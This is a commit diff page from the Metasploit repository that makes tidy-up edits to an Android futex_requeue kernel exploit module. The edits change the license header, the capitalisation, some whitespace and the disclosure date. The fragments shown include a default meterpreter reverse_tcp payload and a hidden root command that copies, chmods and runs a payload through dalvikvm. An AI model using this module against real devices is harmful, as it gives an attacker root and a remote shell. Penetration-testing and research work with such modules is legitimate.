Skip to content

Commit 1ced9a2

Browse files
committed
Land rapid7#4748, msftidy fixes for futex_requeue
2 parents 73435c6 + f99ef5c commit 1ced9a2

File tree

1 file changed

+8
-9
lines changed

1 file changed

+8
-9
lines changed

modules/exploits/android/local/futex_requeue.rb

Lines changed: 8 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,8 +1,6 @@
11
##
2-
# This file is part of the Metasploit Framework and may be subject to
3-
# redistribution and commercial restrictions. Please see the Metasploit
4-
# web site for more information on licensing and terms of use.
5-
# http://metasploit.com/
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
64
##
75

86
require 'msf/core'
@@ -16,14 +14,14 @@ class Metasploit4 < Msf::Exploit::Local
1614

1715
def initialize(info={})
1816
super( update_info( info, {
19-
'Name' => 'Android futex requeue kernel exploit',
17+
'Name' => 'Android Futex Requeue Kernel Exploit',
2018
'Description' => %q{
2119
This module exploits a bug in futex_requeue in the linux kernel.
22-
Any android phone with a kernel built before June 2014 should be vulnerable.
20+
Any android phone with a kernel built before June 2014 should be vulnerable.
2321
},
2422
'License' => MSF_LICENSE,
2523
'Author' => [
26-
'Pinkie Pie', #discovery
24+
'Pinkie Pie', #discovery
2725
'geohot', #towelroot
2826
'timwr' #metasploit module
2927
],
@@ -41,7 +39,8 @@ def initialize(info={})
4139
{
4240
'PAYLOAD' => 'android/meterpreter/reverse_tcp',
4341
},
44-
'DefaultTarget' => 0
42+
'DefaultTarget' => 0,
43+
'DisclosureDate' => "May 03 2014"
4544
}
4645
))
4746

@@ -74,7 +73,7 @@ def exploit
7473
rootcmd += "cp " + payloadfile + " #{rootpayload} && "
7574
rootcmd += "chmod 766 #{rootpayload} && "
7675
rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"
77-
76+
7877
process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})
7978
process.channel.read
8079
end

0 commit comments

Comments
 (0)